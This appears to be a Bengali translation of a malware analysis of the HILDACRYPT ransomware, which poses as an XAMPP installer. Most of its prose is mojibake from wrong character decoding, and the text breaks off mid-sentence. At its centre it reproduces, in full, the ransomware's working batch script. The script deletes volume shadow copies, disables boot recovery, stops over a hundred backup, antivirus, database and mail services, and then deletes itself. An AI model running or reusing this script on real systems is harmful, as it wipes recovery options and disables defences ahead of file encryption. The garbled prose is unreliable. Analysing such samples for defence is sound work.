HILDACRYPT: āύāϤ⧁āύ ransomware āĻšāĻŋāϟ āĻŦā§āϝāĻžāĻ•āφāĻĒ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύ

āĻšā§āϝāĻžāϞ⧋, āĻšāĻžāĻŦāϰ! āφāĻŦāĻžāϰāĻ“, āφāĻŽāϰāĻž Ransomware āĻŦāĻŋāĻ­āĻžāĻ— āĻĨ⧇āϕ⧇ āĻŽā§āϝāĻžāϞāĻ“āϝāĻŧā§āϝāĻžāϰ⧇āϰ āϏāĻ°ā§āĻŦāĻļ⧇āώ āϏāĻ‚āĻ¸ā§āĻ•āϰāĻŖ āϏāĻŽā§āĻĒāĻ°ā§āϕ⧇ āĻ•āĻĨāĻž āĻŦāϞāĻ›āĻŋāĨ¤ HILDACRYPT āĻšāϞ āĻāĻ•āϟāĻŋ āύāϤ⧁āύ ransomware, Hilda āĻĒāϰāĻŋāĻŦāĻžāϰ⧇āϰ āĻāĻ•āϜāύ āϏāĻĻāĻ¸ā§āϝ āϝāĻž āφāĻ—āĻ¸ā§āϟ 2019-āĻ āφāĻŦāĻŋāĻˇā§āĻ•ā§ƒāϤ āĻšāϝāĻŧ⧇āĻ›āĻŋāϞ, āϏāĻĢā§āϟāĻ“āϝāĻŧā§āϝāĻžāϰāϟāĻŋ āĻŦāĻŋāϤāϰāĻŖ āĻ•āϰāĻžāϰ āϜāĻ¨ā§āϝ āĻŦā§āϝāĻŦāĻšā§ƒāϤ Netflix āĻ•āĻžāĻ°ā§āϟ⧁āύ⧇āϰ āύāĻžāĻŽāĻžāύ⧁āϏāĻžāϰ⧇āĨ¤ āφāϜ āφāĻŽāϰāĻž āĻāχ āφāĻĒāĻĄā§‡āϟ āĻšāĻ“āϝāĻŧāĻž āĻ°â€ā§āϝāĻžāύāϏāĻŽāĻ“āϝāĻŧā§āϝāĻžāϰ āĻ­āĻžāχāϰāĻžāϏ⧇āϰ āĻĒā§āϰāϝ⧁āĻ•ā§āϤāĻŋāĻ—āϤ āĻŦ⧈āĻļāĻŋāĻˇā§āĻŸā§āϝāϗ⧁āϞāĻŋāϰ āϏāĻžāĻĨ⧇ āĻĒāϰāĻŋāϚāĻŋāϤ āĻšāĻšā§āĻ›āĻŋāĨ¤

HILDACRYPT: āύāϤ⧁āύ ransomware āĻšāĻŋāϟ āĻŦā§āϝāĻžāĻ•āφāĻĒ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύ

Hilda ransomware-āĻāϰ āĻĒā§āϰāĻĨāĻŽ āϏāĻ‚āĻ¸ā§āĻ•āϰāϪ⧇, Youtube-āĻ āĻĒā§‹āĻ¸ā§āϟ āĻ•āϰāĻž āĻāĻ•āϜāύ⧇āϰ āĻāĻ•āϟāĻŋ āϞāĻŋāĻ™ā§āĻ• āϞāϤāĻž āĻŽā§āĻ•ā§āϤāĻŋāĻĒāĻŖ āϚāĻŋāĻ āĻŋāϤ⧇ āĻ•āĻžāĻ°ā§āϟ⧁āύ āϏāĻŋāϰāĻŋāϜ āĻ›āĻŋāϞāĨ¤ HILDACRYPT āĻāĻ•āϟāĻŋ āĻŦ⧈āϧ XAMPP āχāύāĻ¸ā§āϟāϞāĻžāϰ āĻšāĻŋāϏāĻžāĻŦ⧇ āĻŽāĻžāĻ¸ā§āĻ•āϰ⧇āĻĄ āĻ•āϰ⧇, āĻāĻ•āϟāĻŋ āϏāĻšāĻœā§‡ āχāύāĻ¸ā§āϟāϞ āĻ•āϰāĻž Apache āĻŦāĻŋāϤāϰāĻŖ āϝāĻžāϤ⧇ MariaDB, PHP, āĻāĻŦāĻ‚ āĻĒāĻžāĻ°ā§āϞ āĻ…āĻ¨ā§āϤāĻ°ā§āϭ⧁āĻ•ā§āϤ āĻĨāĻžāϕ⧇āĨ¤ āĻāĻ•āχ āϏāĻŽāϝāĻŧ⧇, āĻ•ā§āϰāĻŋāĻĒā§āĻŸā§‹āϞāĻ•āĻžāϰ⧇āϰ āĻāĻ•āϟāĻŋ āφāϞāĻžāĻĻāĻž āĻĢāĻžāχāϞ⧇āϰ āύāĻžāĻŽ āϰāϝāĻŧ⧇āϛ⧇ - xampāĨ¤ āωāĻĒāϰāĻ¨ā§āϤ⧁, ransomware āĻĢāĻžāχāϞ⧇ āĻāĻ•āϟāĻŋ āχāϞ⧇āĻ•āĻŸā§āϰāύāĻŋāĻ• āĻ¸ā§āĻŦāĻžāĻ•ā§āώāϰ āύ⧇āχāĨ¤

āĻ¸ā§āĻŸā§āϝāĻžāϟāĻŋāĻ• āĻŦāĻŋāĻļā§āϞ⧇āώāĻŖ

āĻ°â€ā§āϝāĻžāύāϏāĻŽāĻ“āϝāĻŧā§āϝāĻžāϰāϟāĻŋ MS-āĻāϰ āϜāĻ¨ā§āϝ āϞ⧇āĻ–āĻž āĻāĻ•āϟāĻŋ PE32 .NET āĻĢāĻžāχāϞ⧇āϰ āĻŽāĻ§ā§āϝ⧇ āϰāϝāĻŧ⧇āϛ⧇āĨ¤ WindowsāĻāϰ āφāĻ•āĻžāϰ ā§§ā§Šā§Ģ,ā§§ā§Ŧā§Ž āĻŦāĻžāχāϟāĨ¤ āĻŽā§‚āϞ āĻĒā§āϰ⧋āĻ—ā§āϰāĻžāĻŽ āϕ⧋āĻĄ āĻāĻŦāĻ‚ āĻĄāĻŋāĻĢ⧇āĻ¨ā§āĻĄāĻžāϰ āϕ⧋āĻĄ āωāĻ­āϝāĻŧāχ āϏāĻŋ# (C#) āĻ­āĻžāώāĻžāϝāĻŧ āϞ⧇āĻ–āĻžāĨ¤ āĻ•āĻŽā§āĻĒāĻžāχāϞ⧇āĻļāύ⧇āϰ āϤāĻžāϰāĻŋāĻ– āĻ“ āϏāĻŽāϝāĻŧ āĻ¸ā§āĻŸā§āϝāĻžāĻŽā§āĻĒ āĻ…āύ⧁āϝāĻžāϝāĻŧā§€, āĻŦāĻžāχāύāĻžāϰāĻŋ āĻĢāĻžāχāϞāϟāĻŋ ⧍ā§Ļ⧧⧝ āϏāĻžāϞ⧇āϰ ā§§ā§Ēāχ āϏ⧇āĻĒā§āĻŸā§‡āĻŽā§āĻŦāϰ āϤ⧈āϰāĻŋ āĻ•āϰāĻž āĻšāϝāĻŧ⧇āĻ›āĻŋāϞāĨ¤

HILDACRYPT: āύāϤ⧁āύ ransomware āĻšāĻŋāϟ āĻŦā§āϝāĻžāĻ•āφāĻĒ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύ

āĻĄāĻŋāĻŸā§‡āĻ•ā§āϟ āχāϟ āχāϜāĻŋ āĻ…āύ⧁āϏāĻžāϰ⧇, āĻ•āύāĻĢāĻŋāωāϜāĻžāϰ āĻāĻŦāĻ‚ āĻ•āύāĻĢāĻŋāωāϜāĻžāϰāĻāĻ•ā§āϏ āĻŦā§āϝāĻŦāĻšāĻžāϰ āĻ•āϰ⧇ āĻ°ā§āϝāĻžāύāϏāĻŽāĻ“āϝāĻŧā§āϝāĻžāϰ āϏāĻ‚āϰāĻ•ā§āώāĻŖāĻžāĻ—āĻžāϰāϭ⧁āĻ•ā§āϤ āĻ•āϰāĻž āĻšāϝāĻŧ⧇āϛ⧇, āϤāĻŦ⧇ āĻāχ āĻ…āĻŦāĻĢāĻžāϏāϕ⧇āϟāϰāϗ⧁āϞāĻŋ āφāϗ⧇āϰ āĻŽāϤ⧋āχ, āĻļ⧁āϧ⧁āĻŽāĻžāĻ¤ā§āϰ āĻ•āύāĻĢāĻŋāωāϜāĻžāϰāĻāĻ•ā§āϏ āĻ•āύāĻĢāĻŋāωāϜāĻžāϰ⧇āϰ āωāĻ¤ā§āϤāϰāϏ⧂āϰāĻŋ, āϤāĻžāχ āϤāĻžāĻĻ⧇āϰ āϕ⧋āĻĄ āĻ¸ā§āĻŦāĻžāĻ•ā§āώāϰāϗ⧁āϞāĻŋ āĻāĻ•āχ āϰāĻ•āĻŽāĨ¤

HILDACRYPT: āύāϤ⧁āύ ransomware āĻšāĻŋāϟ āĻŦā§āϝāĻžāĻ•āφāĻĒ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύ

HILDACRYPT āĻĒā§āϰāĻ•ā§ƒāϤāĻĒāĻ•ā§āώ⧇ ConfuserEx āĻāϰ āϏāĻžāĻĨ⧇ āĻĒā§āϝāĻžāϕ⧇āϜ āĻ•āϰāĻž āĻšāϝāĻŧ⧇āϛ⧇āĨ¤

HILDACRYPT: āύāϤ⧁āύ ransomware āĻšāĻŋāϟ āĻŦā§āϝāĻžāĻ•āφāĻĒ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύ

SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

āφāĻ•ā§āϰāĻŽāĻŖ āϭ⧇āĻ•ā§āϟāϰ

āϏāĻŽā§āĻ­āĻŦāϤ, āĻ°â€ā§āϝāĻžāύāϏāĻŽāĻ“āϝāĻŧā§āϝāĻžāϰāϟāĻŋ āĻ“āϝāĻŧ⧇āĻŦ āĻĒā§āϰ⧋āĻ—ā§āϰāĻžāĻŽāĻŋāĻ‚ āϏāĻžāχāĻŸā§‡āϰ āĻāĻ•āϟāĻŋāϤ⧇ āφāĻŦāĻŋāĻˇā§āĻ•ā§ƒāϤ āĻšāϝāĻŧ⧇āĻ›āĻŋāϞ, āϝāĻž āĻāĻ•āϟāĻŋ āĻŦ⧈āϧ XAMPP āĻĒā§āϰ⧋āĻ—ā§āϰāĻžāĻŽ āĻšāĻŋāϏāĻžāĻŦ⧇ āĻ›āĻĻā§āĻŽāĻŦ⧇āĻļā§€āĨ¤

āϏāĻ‚āĻ•ā§āϰāĻŽāϪ⧇āϰ āĻĒ⧁āϰ⧋ āĻšā§‡āχāύāϟāĻŋ āĻĻ⧇āĻ–āĻž āϝāĻžāϝāĻŧ app.any.run āĻ¸ā§āϝāĻžāĻ¨ā§āĻĄāĻŦāĻ•ā§āϏ.

āĻ…āĻ¸ā§āĻĒāĻˇā§āϟāϤāĻž

āĻ°ā§āϝāĻžāύāϏāĻŽāĻ“āϝāĻŧā§āϝāĻžāϰ āĻ¸ā§āĻŸā§āϰāĻŋāĻ‚āϗ⧁āϞāĻŋ āĻāύāĻ•ā§āϰāĻŋāĻĒā§āϟ āĻ•āϰāĻž āφāĻ•āĻžāϰ⧇ āϏāĻ‚āϰāĻ•ā§āώāĻŖ āĻ•āϰāĻž āĻšāϝāĻŧāĨ¤ āϚāĻžāϞ⧁ āĻšāϞ⧇, HILDACRYPT āĻāϗ⧁āϞāĻŋāϕ⧇ Base64 āĻāĻŦāĻ‚ AES-256-CBC āĻŦā§āϝāĻŦāĻšāĻžāϰ āĻ•āϰ⧇ āĻĄāĻŋāĻ•ā§āϰāĻŋāĻĒā§āϟ āĻ•āϰ⧇⧎

HILDACRYPT: āύāϤ⧁āύ ransomware āĻšāĻŋāϟ āĻŦā§āϝāĻžāĻ•āφāĻĒ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύ

āĻŦāĻŋāĻ¨ā§āϝāĻžāϏ

āĻĒā§āϰāĻĨāĻŽāϤ, āĻ°ā§āϝāĻžāύāϏāĻŽāĻ“āϝāĻŧā§āϝāĻžāϰ %AppDataRoaming%-āĻ āĻāĻ•āϟāĻŋ āĻĢā§‹āĻ˛ā§āĻĄāĻžāϰ āϤ⧈āϰāĻŋ āĻ•āϰ⧇ āϝ⧇āĻ–āĻžāύ⧇ GUID (Globally Unique Identifier) ​​āĻĒā§āϝāĻžāϰāĻžāĻŽāĻŋāϟāĻžāϰ āĻāϞ⧋āĻŽā§‡āϞ⧋āĻ­āĻžāĻŦ⧇ āϤ⧈āϰāĻŋ āĻšāϝāĻŧāĨ¤ āĻāχ āĻ…āĻŦāĻ¸ā§āĻĨāĻžāύ⧇ āĻāĻ•āϟāĻŋ āĻŦā§āϝāĻžāϟ āĻĢāĻžāχāϞ āϝ⧋āĻ— āĻ•āϰ⧇, ransomware āĻ­āĻžāχāϰāĻžāϏ āĻāϟāĻŋ cmd.exe āĻŦā§āϝāĻŦāĻšāĻžāϰ āĻ•āϰ⧇ āϚāĻžāϞ⧁ āĻ•āϰ⧇:

cmd.exe /c JKfgkgj3hjgfhjka.bat āĻāĻŦāĻ‚ āĻĒā§āϰāĻ¸ā§āĻĨāĻžāύ āĻ•āϰ⧁āύ

HILDACRYPT: āύāϤ⧁āύ ransomware āĻšāĻŋāϟ āĻŦā§āϝāĻžāĻ•āφāĻĒ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύHILDACRYPT: āύāϤ⧁āύ ransomware āĻšāĻŋāϟ āĻŦā§āϝāĻžāĻ•āφāĻĒ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύ
āĻāϟāĻŋ āϤāĻžāϰāĻĒāϰ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻŦ⧈āĻļāĻŋāĻˇā§āĻŸā§āϝ āĻŦāĻž āĻĒāϰāĻŋāώ⧇āĻŦāĻžāϗ⧁āϞāĻŋ āύāĻŋāĻˇā§āĻ•ā§āϰāĻŋāϝāĻŧ āĻ•āϰāϤ⧇ āĻāĻ•āϟāĻŋ āĻŦā§āϝāĻžāϚ āĻ¸ā§āĻ•ā§āϰāĻŋāĻĒā§āϟ āϚāĻžāϞāĻžāύ⧋ āĻļ⧁āϰ⧁ āĻ•āϰ⧇āĨ¤

HILDACRYPT: āύāϤ⧁āύ ransomware āĻšāĻŋāϟ āĻŦā§āϝāĻžāĻ•āφāĻĒ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύ

āĻ¸ā§āĻ•ā§āϰāĻŋāĻĒā§āĻŸā§‡ āĻ•āĻŽāĻžāĻ¨ā§āĻĄā§‡āϰ āĻāĻ•āϟāĻŋ āĻĻā§€āĻ°ā§āϘ āϤāĻžāϞāĻŋāĻ•āĻž āϰāϝāĻŧ⧇āϛ⧇ āϝāĻž āĻ›āĻžāϝāĻŧāĻž āĻ•āĻĒāĻŋ āĻ§ā§āĻŦāĻ‚āϏ āĻ•āϰ⧇, āĻāϏāĻ•āĻŋāωāĻāϞ āϏāĻžāĻ°ā§āĻ­āĻžāϰ, āĻŦā§āϝāĻžāĻ•āφāĻĒ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύ āύāĻŋāĻˇā§āĻ•ā§āϰāĻŋāϝāĻŧ āĻ•āϰ⧇āĨ¤

āωāĻĻāĻžāĻšāϰāĻŖāĻ¸ā§āĻŦāϰ⧂āĻĒ, āĻāϟāĻŋ Acronis āĻŦā§āϝāĻžāĻ•āφāĻĒ āĻĒāϰāĻŋāώ⧇āĻŦāĻžāϗ⧁āϞāĻŋ āĻŦāĻ¨ā§āϧ āĻ•āϰāĻžāϰ āĻŦā§āϝāĻ°ā§āĻĨ āĻšā§‡āĻˇā§āϟāĻž āĻ•āϰ⧇⧎ āωāĻĒāϰāĻ¨ā§āϤ⧁, āĻāϟāĻŋ āύāĻŋāĻŽā§āύāϞāĻŋāĻ–āĻŋāϤ āĻŦāĻŋāĻ•ā§āϰ⧇āϤāĻžāĻĻ⧇āϰ āĻĨ⧇āϕ⧇ āĻŦā§āϝāĻžāĻ•āφāĻĒ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύ āφāĻ•ā§āϰāĻŽāĻŖ āĻ•āϰ⧇: Veeam, Sophos, Kaspersky, McAfee āĻāĻŦāĻ‚ āĻ…āĻ¨ā§āϝāĻžāĻ¨ā§āϝāĨ¤

@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0

āωāĻĒāϰ⧇ āωāĻ˛ā§āϞāĻŋāĻ–āĻŋāϤ āĻĒāϰāĻŋāώ⧇āĻŦāĻž āĻāĻŦāĻ‚ āĻĒā§āϰāĻ•ā§āϰāĻŋāϝāĻŧāĻžāϗ⧁āϞāĻŋ āύāĻŋāĻˇā§āĻ•ā§āϰāĻŋāϝāĻŧ āĻšāϝāĻŧ⧇ āϗ⧇āϞ⧇, āĻ•ā§āϰāĻŋāĻĒā§āĻŸā§‹āϞ⧋āĻ•āĻžāϰ āϏāĻŽāĻ¸ā§āϤ āĻĒā§āϰāϝāĻŧā§‹āϜāύ⧀āϝāĻŧ āĻĒāϰāĻŋāώ⧇āĻŦāĻžāϗ⧁āϞāĻŋ āĻŦāĻ¨ā§āϧ āϰāϝāĻŧ⧇āϛ⧇ āϤāĻž āύāĻŋāĻļā§āϚāĻŋāϤ āĻ•āϰāĻžāϰ āϜāĻ¨ā§āϝ āϟāĻžāĻ¸ā§āĻ•āϞāĻŋāĻ¸ā§āϟ āĻ•āĻŽāĻžāĻ¨ā§āĻĄ āĻŦā§āϝāĻŦāĻšāĻžāϰ āĻ•āϰ⧇ āϚāϞāĻŽāĻžāύ āϏāĻŽāĻ¸ā§āϤ āĻĒā§āϰāĻ•ā§āϰāĻŋāϝāĻŧāĻž āϏāĻŽā§āĻĒāĻ°ā§āϕ⧇ āϤāĻĨā§āϝ āϏāĻ‚āĻ—ā§āϰāĻš āĻ•āϰ⧇āĨ¤
āϟāĻžāĻ¸ā§āĻ•āϞāĻŋāĻ¸ā§āϟ v/fo csv

āĻāχ āĻ•āĻŽāĻžāĻ¨ā§āĻĄāϟāĻŋ āϚāϞāĻŽāĻžāύ āĻĒā§āϰāĻ•ā§āϰāĻŋāϝāĻŧāĻžāϗ⧁āϞāĻŋāϰ āĻāĻ•āϟāĻŋ āĻŦāĻŋāĻļāĻĻ āϤāĻžāϞāĻŋāĻ•āĻž āĻĒā§āϰāĻĻāĻ°ā§āĻļāύ āĻ•āϰ⧇, āϝāĻžāϰ āωāĻĒāĻžāĻĻāĻžāύāϗ⧁āϞāĻŋ "," āϚāĻŋāĻšā§āύ āĻĻā§āĻŦāĻžāϰāĻž āĻĒ⧃āĻĨāĻ• āĻ•āϰāĻž āĻšāϝāĻŧāĨ¤
ÂĢÂĢcsrss.exeÂģ,ÂĢ448Âģ,ÂĢservicesÂģ,ÂĢ0Âģ,ÂĢ1īŋŊ896 īŋŊīŋŊÂģ,ÂĢunknownÂģ,ÂģīŋŊ/īŋŊÂģ,ÂĢ0:00:03Âģ,ÂģīŋŊ/īŋŊÂģÂģ

HILDACRYPT: āύāϤ⧁āύ ransomware āĻšāĻŋāϟ āĻŦā§āϝāĻžāĻ•āφāĻĒ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύ

āĻāχ āĻšā§‡āĻ• āĻ•āϰāĻžāϰ āĻĒāϰ⧇, āĻ°ā§āϝāĻžāύāϏāĻŽāĻ“āϝāĻŧā§āϝāĻžāϰ āĻāύāĻ•ā§āϰāĻŋāĻĒāĻļāύ āĻĒā§āϰāĻ•ā§āϰāĻŋāϝāĻŧāĻž āĻļ⧁āϰ⧁ āĻ•āϰ⧇āĨ¤

āĻāύāĻ•ā§āϰāĻŋāĻĒāĻļāύ

āĻĢāĻžāχāϞ āĻāύāĻ•ā§āϰāĻŋāĻĒāĻļāύ

HILDACRYPT āϰāĻŋāϏāĻžāχāϕ⧇āϞ.āĻŦāĻŋāύ āĻāĻŦāĻ‚ āϰ⧇āĻĢāĻžāϰ⧇āĻ¨ā§āϏ āĻ…ā§āϝāĻžāϏ⧇āĻŽā§āĻŦāϞāĻŋāϏ āĻŽāĻžāχāĻ•ā§āϰ⧋āϏāĻĢā§āϟ āĻĢā§‹āĻ˛ā§āĻĄāĻžāϰāϗ⧁āϞāĻŋ āĻŦā§āϝāϤ⧀āϤ āĻšāĻžāĻ°ā§āĻĄ āĻĄā§āϰāĻžāχāϭ⧇āϰ āϏāĻŽāĻ¸ā§āϤ āĻĒāĻžāĻ“āϝāĻŧāĻž āϏāĻžāĻŽāĻ—ā§āϰ⧀āϰ āĻŽāĻ§ā§āϝ āĻĻāĻŋāϝāĻŧ⧇ āϝāĻžāϝāĻŧāĨ¤ āĻĒāϰāĻŦāĻ°ā§āϤ⧀āϤ⧇ .Net āĻ…ā§āϝāĻžāĻĒā§āϞāĻŋāϕ⧇āĻļāύ⧇āϰ āϜāĻ¨ā§āϝ āϗ⧁āϰ⧁āĻ¤ā§āĻŦāĻĒā§‚āĻ°ā§āĻŖ dll, pdb, āχāĻ¤ā§āϝāĻžāĻĻāĻŋ āĻĢāĻžāχāϞ āϰāϝāĻŧ⧇āϛ⧇ āϝāĻž ransomware āĻāϰ āĻ…āĻĒāĻžāϰ⧇āĻļāύāϕ⧇ āĻĒā§āϰāĻ­āĻžāĻŦāĻŋāϤ āĻ•āϰāϤ⧇ āĻĒāĻžāϰ⧇āĨ¤ āĻāύāĻ•ā§āϰāĻŋāĻĒā§āϟ āĻ•āϰāĻž āĻĢāĻžāχāϞāϗ⧁āϞāĻŋ āĻ…āύ⧁āϏāĻ¨ā§āϧāĻžāύ āĻ•āϰāϤ⧇, āύāĻŋāĻŽā§āύāϞāĻŋāĻ–āĻŋāϤ 